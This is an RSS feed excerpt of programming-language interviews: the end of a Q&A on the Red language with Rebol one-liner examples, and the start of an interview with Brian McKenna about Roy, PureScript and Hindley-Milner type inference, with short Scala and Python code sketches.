&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-869fRKUVs2sTdVDYrqblMQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I started programming micro-computers, an Amiga in my case, in my teens. I have now been programming for more than 30 years. After my early experiences, I was unhappy with existing programming languages and tools. This was mostly because I found them not productive or friendly enough for my taste. So, when I stumbled across the Rebol language, in 1999, it was an eye-opener on what was wrong with so-called “modern” computing practice. (Nowadays it’s even worse.) Fighting complexity on all software fronts became the logical course of action.&lt;&#x2F;p&gt;
&lt;p&gt;In 2010, Rebol was still closed source. I deeply felt that the approach had a lot more to offer, but Rebol was barely evolving. This was the trigger for me to start work on an open-source relative of Rebol, with much higher ambitions and a broader field of usage.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the main selling points of Red?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;First fullstack programming solution: it combines in one tool the ability to write high-level code (GUI apps, scripting and DSLs) and fast low-level code (device drivers, operating systems, native interfacing, etc.). Moreover, Red is also a &lt;em&gt;both-sided&lt;&#x2F;em&gt; technology (client &amp;amp; server).&lt;&#x2F;li&gt;
&lt;li&gt;Cross-platform native code compiler: from any platform the toolchain runs on, you can compile to about 15 other platforms, with a simple command-line option (-t Windows, -t Linux, -t Darwin, -t RPi, …).&lt;&#x2F;li&gt;
&lt;li&gt;Extremely lightweight: Red is a 1MB, single-file, no-install, no-setup toolchain. It typically takes a few seconds to download and you can immediately start writing and running code; there’s &lt;em&gt;nothing&lt;&#x2F;em&gt; to set up (it’s just terrible that this is the exception instead of the norm…).&lt;&#x2F;li&gt;
&lt;li&gt;Batteries-included solution: it comes with a very rich runtime library, despite its tiny size, covering pretty much anything you need for common tasks.&lt;&#x2F;li&gt;
&lt;li&gt;DSL-oriented environment: Red comes with many embedded DSLs addressing important needs (like GUIs or system programming). DSLs are a very powerful way to reduce the complexity arising from frameworks or APIs, while drastically increasing productivity. Red includes a DSL (called Parse) for constructing DSLs.&lt;&#x2F;li&gt;
&lt;li&gt;Red (like Rebol) is a Lisp derivative, but with a human-friendly syntax (no parenthesis hell). Red is its own data format. All code is treated as data until you evaluate it, code&#x2F;data serialization comes for free. The minimal punctuation makes it easy on the eye.&lt;&#x2F;li&gt;
&lt;li&gt;The underlying philosophy of Red (as was that of Rebol) is to make the simple easy and the difficult possible.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;What made Rebol the main inspiration for Red?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Rebol is one of the most innovative programming languages created in the last 20 years. Sadly, it remained under the radar, being closed source at a time when open-source languages like Perl, Python and Ruby hit the streets. Rebol’s approach shakes the foundation of what programmers consider “simple” or “efficient” in programming. Typically, APIs that other languages would call “simple” look uselessly complicated once you are used to wearing Rebol glasses. ;-) Here are a few one-liners as examples (using the Rebol2 REPL):&lt;&#x2F;p&gt;
&lt;p&gt;Create a GUI window with a button printing, on click, Hello in the console:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;view layout [button “Click Me” [print “Hello”]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Dump the content of a web page in console:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;print read http:&#x2F;&#x2F;rebol.com&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Extract the title of a web page:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;parse read http:&#x2F;&#x2F;rebol.com [thru &amp;lt;title&amp;gt; copy text to &amp;lt;&#x2F;title&amp;gt; (print text)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Send the list of files in current folder by email:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;send user@domain.com mold read %.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Retrieve records from a MySQL database and print them in console:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;foreach row read&#x2F;custom mysql:&#x2F;&#x2F;root@localhost&#x2F;books [“SELECT * FROM authors”] [print row]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice that even if you never looked at Rebol code before, you can nonetheless read it and guess what most of the code is doing.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the main differences between Rebol and Red?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Red can be (cross-)compiled to native code, while Rebol is only interpreted. Compiled code can run much faster than interpreted code.&lt;&#x2F;li&gt;
&lt;li&gt;Red allows system programming and fast low-level code, while Rebol is stuck at scripting level.&lt;&#x2F;li&gt;
&lt;li&gt;Red relies on native widgets and native backends for GUI support, while Rebol has a custom GUI engine. So Red will make your GUI apps feel more natural to the user and better integrated with the OS.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Besides that, the languages themselves are very similar, somewhere around 95% the same. If you know Rebol, you know Red.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Red covers the whole range of abstraction between low-level and high-level programming by offering Red&#x2F;System as a dialect with C-type semantics and Rebol-type syntax. Was the distinction between Red and Red&#x2F;System present in the original design? What advantages do you gain by using Red&#x2F;System?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Absolutely, Red&#x2F;System was one of the main incentives to build a new programming stack instead of simply duplicating the Rebol implementation. Red&#x2F;System is a statically compiled language targeting native code (like C). Red&#x2F;System serves two main purposes:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;provide an embedded DSL to Red users for fast code support and system programming needs&lt;&#x2F;li&gt;
&lt;li&gt;fill the role of an IR (Intermediate Representation) language for compiled Red code&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;AFAIK, Red is the first high-level language which features such an embedded DSL for general-purpose low-level programming.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Who uses Red&#x2F;Rebol?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Rebol community used to be relatively big in the early 2000s, but it shrank a lot as its evolution tailed off. The profile of its users was astonishingly broad on the skills scale. Many were attracted by its simplicity for simple tasks and its cross-platform GUI engine, but others were more interested in its depth (dynamic binding, easy DSL crafting, strong meta-programming abilities, …).&lt;&#x2F;p&gt;
&lt;p&gt;Since then, only the hardcore fans, or companies which have built their software on top of it, continue to use and promote it. Many of those same people now form the early adopters of Red, along with many other people who were interested in Rebol when it launched but rejected it due to its closed-source nature. Some of them wrote libraries for Red, others small games or even a Windows device driver! :-) As soon as Red is ready for production, we’ll make sure many more people join them and have fun using Red.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;For which scenarios do you think Red is an appropriate language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Red is a general-purpose programming solution which should be good enough for &lt;em&gt;any&lt;&#x2F;em&gt; programming task. In practice, it’s (only) limited by the available frameworks and libraries. So these tasks are a very good match for Red:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;scripting &#x2F; glue code&lt;&#x2F;li&gt;
&lt;li&gt;GUI apps (in upcoming v0.6.0)&lt;&#x2F;li&gt;
&lt;li&gt;Android apps (in v0.6.1)&lt;&#x2F;li&gt;
&lt;li&gt;data processing&lt;&#x2F;li&gt;
&lt;li&gt;grammar parsers &#x2F; DSL creation&lt;&#x2F;li&gt;
&lt;li&gt;system programming&lt;&#x2F;li&gt;
&lt;li&gt;device drivers&lt;&#x2F;li&gt;
&lt;li&gt;IoT device programming (running on Intel or ARM CPUs)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Once we reach 1.0 (next year), Red will also be very good for:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;webapps programming&lt;&#x2F;li&gt;
&lt;li&gt;servers creation&lt;&#x2F;li&gt;
&lt;li&gt;2D games&lt;&#x2F;li&gt;
&lt;li&gt;robotics&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Rebol and Red offer a great variety of built in types with practical applications. Some would argue that it is better to offer a small core of language features. What is your take on that?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Rebol and Red offer about 50 datatypes in a runtime of about 500KB. Among them, two-thirds have a specific literal form (like money, email, url, time, date, colors,…) which gives you, out of the box, a rich set of literals you can use for building embedded DSL.&lt;&#x2F;p&gt;
&lt;p&gt;Another big gain is that most of the features you need for daily work are already there, as first-class citizens, perfectly integrated with the rest, working exactly the same on every supported platform. This is a productivity boost and makes learning&#x2F;using the language much more pleasant (no need for “imports” for any simple task). Such languages are pragmatic, aiming at reducing the cost of building software.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is a sky-high view of how Red is implemented? Are all the components (parsers, code generators, garbage collectors, etc) hand-written? What dependencies does Red have?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Except for a good part of the unit tests, which are generated by script, everything else is hand-written. We are bootstrapping Red using Rebol, so the toolchain (compilers, linker, builders) is written in Rebol2. Rebol offers a very effective parsing DSL and deep metaprogramming abilities, so there is simply no need for any other tool to build such a toolchain. Red scripts can be interpreted from the REPL or compiled to native code, using Red&#x2F;System as an intermediary target. The runtime library is built in a mix of Red and Red&#x2F;System code.&lt;&#x2F;p&gt;
&lt;p&gt;Red executables are typically around 0.5MB and have no dependencies.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How complete is Red as of Mid-2015?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There’s already a lot implemented, so I’ll describe rather what’s missing. Right now, we are completing the cross-platform GUI support with a first backend for Windows. Android, Linux and OS X backends will follow. The I&#x2F;O is currently limited to simple file operations and HTTP client support only. Modular compilation, full garbage collector and concurrency support are the main features missing before reaching 1.0. We aim at launching the 1.0 release in 2016.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Where do you see Red in the future?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Red has the potential to seduce many developers (especially indie developers, who have the freedom of choice) who are frustrated by existing tools (even the so-called “simple” ones). I expect Red to be widespread in a couple of years, helping programmers achieve many different tasks while having fun doing it and making their lives easier. Red will expand with many strong DSLs for various domains, offering nice replacements for the direct usage of existing libraries. For example, we’ll push it in the robotics and AI fields.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the most important lessons learned from the development of Red?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Open-source is a superior way to build quality software (I just confirmed that fact with the Red project).&lt;&#x2F;li&gt;
&lt;li&gt;Working “in the open” is not always a good thing; sometimes you need to isolate yourself from the outside “noise” to execute complex tasks (mostly design tasks). Being able to do so becomes increasingly difficult as the project grows.&lt;&#x2F;li&gt;
&lt;li&gt;Having to deal with a growing community of users consumes a &lt;em&gt;lot&lt;&#x2F;em&gt; of time. Finding people to deal with the community for you is critical.&lt;&#x2F;li&gt;
&lt;li&gt;Designing good syntactic rules is &lt;em&gt;way&lt;&#x2F;em&gt; more difficult than designing good semantics. That’s a part overlooked by many language designers, who end up with great semantics but terrible syntax.&lt;&#x2F;li&gt;
&lt;li&gt;Writing a native code compiler for a statically typed language is really not difficult: most programmers with a minimal CS background could do it; they’re just not aware they can.&lt;&#x2F;li&gt;
&lt;li&gt;Premature optimization can (often) bite you in the back. Knowing when you’re optimizing prematurely is a bit of a black art.&lt;&#x2F;li&gt;
&lt;li&gt;Every big software project should be started by a team of at least 2 highly tuned, equally skilled developers. Working alone on big projects is insane, and not a guarantee of best results.&lt;&#x2F;li&gt;
&lt;li&gt;If you work on an open-source project that is attractive enough and gathers enough followers, you can live from users’ donations (I did so for 2 years, covering all my basic living expenses). I never thought that would be possible when I started, nor did I count on it. I guess I’m just lucky that Red has an amazing community.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;&lt;strong&gt;What reading material do you recommend for implementing your first programming language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;You can have a good overview of all the required parts in a book like this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.goodreads.com&#x2F;book&#x2F;show&#x2F;112256.Modern_Programming_Languages&quot;&gt;Modern Programming Languages: A Practical Introduction&lt;&#x2F;a&gt;. If you want to go in-depth and dive into more abstract concerns, the “Dragon book” is still the reference.&lt;&#x2F;p&gt;
&lt;p&gt;But the most useful approach is to study several small language implementations; that will give you the best insights into how to achieve it yourself. For example, the Red 0.1.0 release is just a 24KB zip archive, but it already features a working compiler&#x2F;linker for Red&#x2F;System with many features (including FFI). Get it from here: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;red&#x2F;red&#x2F;releases&#x2F;tag&#x2F;v0.1.0&quot;&gt;https:&#x2F;&#x2F;github.com&#x2F;red&#x2F;red&#x2F;releases&#x2F;tag&#x2F;v0.1.0&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What other languages or technologies are you keeping an eye on?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Go: it’s the language with the fastest growth in recent years; understanding why could be a key to helping Red grow faster too. Go’s concurrency model also seems attractive to users, so it is worth studying.&lt;&#x2F;li&gt;
&lt;li&gt;Lua: trying to understand where it’s heading and how it grows.&lt;&#x2F;li&gt;
&lt;li&gt;Python3.x: trying to understand where it’s heading, not sure I understand its strategy though.&lt;&#x2F;li&gt;
&lt;li&gt;WebAssembly: the foundation for the future of web programming.&lt;&#x2F;li&gt;
&lt;li&gt;MagicLeap: the future of HCI!&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</description>
      </item>
      <item>
          <title>Interview with Brian McKenna about Roy, Purescript, Haskell, Idris and dependent types</title>
          <pubDate>Wed, 26 Aug 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types/">&lt;p&gt;As promised in our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley-a09b15f53a2f&quot;&gt;last interview&lt;&#x2F;a&gt; for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&quot;&gt;This is not a Monad tutorial&lt;&#x2F;a&gt; we interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;puffnfresh&quot;&gt;Brian McKenna&lt;&#x2F;a&gt;, creator of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;roy.brianmckenna.org&#x2F;&quot;&gt;Roy&lt;&#x2F;a&gt; programming language. In this interview Brian talks about Roy, its implementation, how it compares with Purescript, and also about dependent types and other interesting technologies like Morte and Unison. I highly recommend that you check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;brianmckenna.org&#x2F;blog&#x2F;&quot;&gt;Brian’s blog&lt;&#x2F;a&gt; after you finish reading this interview.&lt;&#x2F;p&gt;
&lt;p&gt;In the following weeks we will be talking with the creators of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.red-lang.org&#x2F;&quot;&gt;Red programming language&lt;&#x2F;a&gt;, Robert Virding — Erlang co-inventor and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lfe.io&#x2F;&quot;&gt;Lisp Flavored Erlang&lt;&#x2F;a&gt; creator — and with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mirage.io&#x2F;&quot;&gt;MirageOS unikernel&lt;&#x2F;a&gt; dev team.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-vYf7TCGE19Gni5ssKXQaHA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are Roy’s main features?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Roy featured things common to languages which are well suited to typed&lt;br &#x2F;&gt;
functional programming:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Types and type inference (with row polymorphism)&lt;&#x2F;li&gt;
&lt;li&gt;Algebraic data types and pattern matching&lt;&#x2F;li&gt;
&lt;li&gt;Monadic syntax&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Why did you create it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I created Roy after doing years of JavaScript work. I learned Haskell&lt;br &#x2F;&gt;
and it made a huge amount of sense to me. Functional programming with&lt;br &#x2F;&gt;
types seemed like the ideal way for me to work on software and so I&lt;br &#x2F;&gt;
wanted to bring it to web programming.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;I am tempted to say that Roy has some big similarities with &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.purescript.org&#x2F;&quot;&gt;&lt;strong&gt;Purescript&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;. What are the main differences between the two languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Roy was first!&lt;&#x2F;p&gt;
&lt;p&gt;PureScript had almost the exact same goals as Roy but had a much&lt;br &#x2F;&gt;
better implementation. Quoting the PureScript wiki:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Roy is probably the most similar language on the list, and was a&lt;br &#x2F;&gt;
large influence on the development of PureScript.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;I stopped working on Roy once PureScript became roughly equal in&lt;br &#x2F;&gt;
functionality. PureScript’s implementation means it’s a lot easier to&lt;br &#x2F;&gt;
work on and has far fewer bugs.&lt;&#x2F;p&gt;
&lt;p&gt;Originally the PureScript FFI started off being very different (i.e.&lt;br &#x2F;&gt;
it used inline JS instead of an externs file) but recently changed to&lt;br &#x2F;&gt;
being similar to the original design Roy had. That was probably the&lt;br &#x2F;&gt;
biggest difference the projects had.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You implemented the lexer and the parser. Did you do so to learn&#x2F;play or because you thought that the available tools were not good enough?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I implemented a whitespace sensitive lexer which was passed into the&lt;br &#x2F;&gt;
Jison parser generator. It was the same approach which CoffeeScript&lt;br &#x2F;&gt;
took.&lt;&#x2F;p&gt;
&lt;p&gt;A custom lexer was necessary because the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types-63bb1289ea3d&quot;&gt;Jison&lt;&#x2F;a&gt; lexer generator was not&lt;br &#x2F;&gt;
capable of stateful scanning of whitespace.&lt;&#x2F;p&gt;
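&lt;p&gt;To make that “stateful scanning” concrete: an indentation-sensitive lexer keeps a stack of indentation widths between lines and turns changes into explicit INDENT&#x2F;DEDENT tokens for the parser. The following is a minimal, hypothetical Python sketch of the technique (not Roy’s actual lexer):&lt;&#x2F;p&gt;

```python
def lex_indentation(source):
    """Turn leading whitespace into explicit INDENT/DEDENT tokens.

    The stack of open indentation widths is the per-line state that a
    stateless, regex-driven lexer generator cannot keep, which is why a
    hand-written lexer is needed in front of the parser. (Error handling
    for dedents to an unknown width is omitted in this sketch.)
    """
    tokens = []
    stack = [0]  # indentation widths of the currently open blocks
    for line in source.splitlines():
        if not line.strip():
            continue  # blank lines do not open or close blocks
        width = len(line) - len(line.lstrip(" "))
        if width > stack[-1]:          # deeper than before: open a block
            stack.append(width)
            tokens.append(("INDENT", width))
        while width < stack[-1]:       # shallower: close blocks until we match
            stack.pop()
            tokens.append(("DEDENT", width))
        tokens.append(("LINE", line.strip()))
    while stack[-1] > 0:               # close any blocks still open at EOF
        stack.pop()
        tokens.append(("DEDENT", 0))
    return tokens
```

&lt;p&gt;Feeding the resulting token stream into a conventional parser generator is the same approach CoffeeScript took, as mentioned above.&lt;&#x2F;p&gt;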
&lt;p&gt;I prefer working with parser combinators such as Parsec and Trifecta.&lt;br &#x2F;&gt;
They’re easier to work with and allow you to write reusable&lt;br &#x2F;&gt;
abstractions.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you use a whitespace sensitive grammar a la Python&#x2F;Haskell in Roy?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Just to look like Haskell. I hate thinking about syntax — I copy&lt;br &#x2F;&gt;
things as much as I can. I’m also annoyed that we’re still writing&lt;br &#x2F;&gt;
programs using text. They’re trees, not lists of characters!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why is it useful to have monadic sugar in a language that has unrestricted side effects?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Roy was not designed to allow side-effects, but you could do anything&lt;br &#x2F;&gt;
with the FFI and so it was possible.&lt;&#x2F;p&gt;
&lt;p&gt;Scala has (pretty limited) monadic sugar and also unrestricted&lt;br &#x2F;&gt;
side-effects. People use monadic sugar for things as straight-forward&lt;br &#x2F;&gt;
as Option:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  name &amp;lt;- maybeFirstName&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  user &amp;lt;- lookup(name)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  avatar &amp;lt;- getAvatar(user)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;} yield avatar&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Which can be easier to type than:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;maybeFirstName.flatMap { name =&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  lookup(name).flatMap { user =&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    getAvatar(user)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It doesn’t have anything to do with side-effects.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;From what we could read in the Damas-Hindley-Milner type inference algorithm source comments it is based on Robert Smallshire’s Python code. Do you have any recommendation for those who want to implement it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I recommend reading “Generalizing Hindley-Milner Type Inference&lt;br &#x2F;&gt;
Algorithms” which turns the algorithm into explicit separate&lt;br &#x2F;&gt;
constraint collection and constraint solving problems, which is a bit&lt;br &#x2F;&gt;
easier to work with than plain Algorithm W. It’s then possible to do&lt;br &#x2F;&gt;
tree annotation via the cofree comonad, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;brianmckenna.org&#x2F;blog&#x2F;type_annotation_cofree&quot;&gt;which gives a pretty nice&lt;&#x2F;a&gt;&lt;br &#x2F;&gt;
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;brianmckenna.org&#x2F;blog&#x2F;type_annotation_cofree&quot;&gt;implementation&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
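&lt;p&gt;The two-phase structure he recommends — collect type-equality constraints over the tree first, then solve them by unification — can be sketched briefly. This is a hypothetical Python miniature for a toy lambda calculus, not the paper’s (or Roy’s) actual implementation:&lt;&#x2F;p&gt;

```python
import itertools

fresh = (f"t{i}" for i in itertools.count())  # supply of fresh type variables

def collect(expr, env):
    """Phase 1: walk the tree, returning (type, equality constraints)."""
    tag = expr[0]
    if tag == "lit":                               # integer literal
        return "int", []
    if tag == "var":                               # variable lookup
        return env[expr[1]], []
    if tag == "lam":                               # \x -> body
        a = next(fresh)
        t, cs = collect(expr[2], {**env, expr[1]: a})
        return ("fun", a, t), cs
    if tag == "app":                               # f x
        tf, cf = collect(expr[1], env)
        tx, cx = collect(expr[2], env)
        r = next(fresh)
        return r, cf + cx + [(tf, ("fun", tx, r))]

def resolve(t, sub):
    """Chase a type through the substitution built so far."""
    while isinstance(t, str) and t in sub:
        t = sub[t]
    if isinstance(t, tuple):
        return ("fun", resolve(t[1], sub), resolve(t[2], sub))
    return t

def unify(constraints):
    """Phase 2: solve the collected equalities (occurs check omitted)."""
    sub, todo = {}, list(constraints)
    while todo:
        a, b = todo.pop()
        a, b = resolve(a, sub), resolve(b, sub)
        if a == b:
            continue
        if isinstance(a, str) and a.startswith("t"):   # type variable
            sub[a] = b
        elif isinstance(b, str) and b.startswith("t"):
            sub[b] = a
        elif isinstance(a, tuple) and isinstance(b, tuple):
            todo += [(a[1], b[1]), (a[2], b[2])]
        else:
            raise TypeError(f"cannot unify {a} with {b}")
    return sub

def infer(expr):
    t, cs = collect(expr, {})
    return resolve(t, unify(cs))
```

&lt;p&gt;For example, inferring the identity function applied to an integer literal collects one constraint equating a function type with (fun int r), and unification then resolves the result to int. Keeping collection and solving separate, as the paper suggests, is what makes each half easy to test and extend on its own.&lt;&#x2F;p&gt;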
&lt;p&gt;&lt;strong&gt;What reading material do you recommend for implementing your first programming language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The source code of other languages is a great resource. I think the&lt;br &#x2F;&gt;
PureScript and Idris compilers are somewhat easy to play around with.&lt;&#x2F;p&gt;
&lt;p&gt;Hackage has a lot of code to look at, such as reference&lt;br &#x2F;&gt;
implementations of Algorithm W:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackage.haskell.org&#x2F;packages&#x2F;&quot;&gt;https:&#x2F;&#x2F;hackage.haskell.org&#x2F;packages&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What would you recommend us to read to learn about different type systems?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
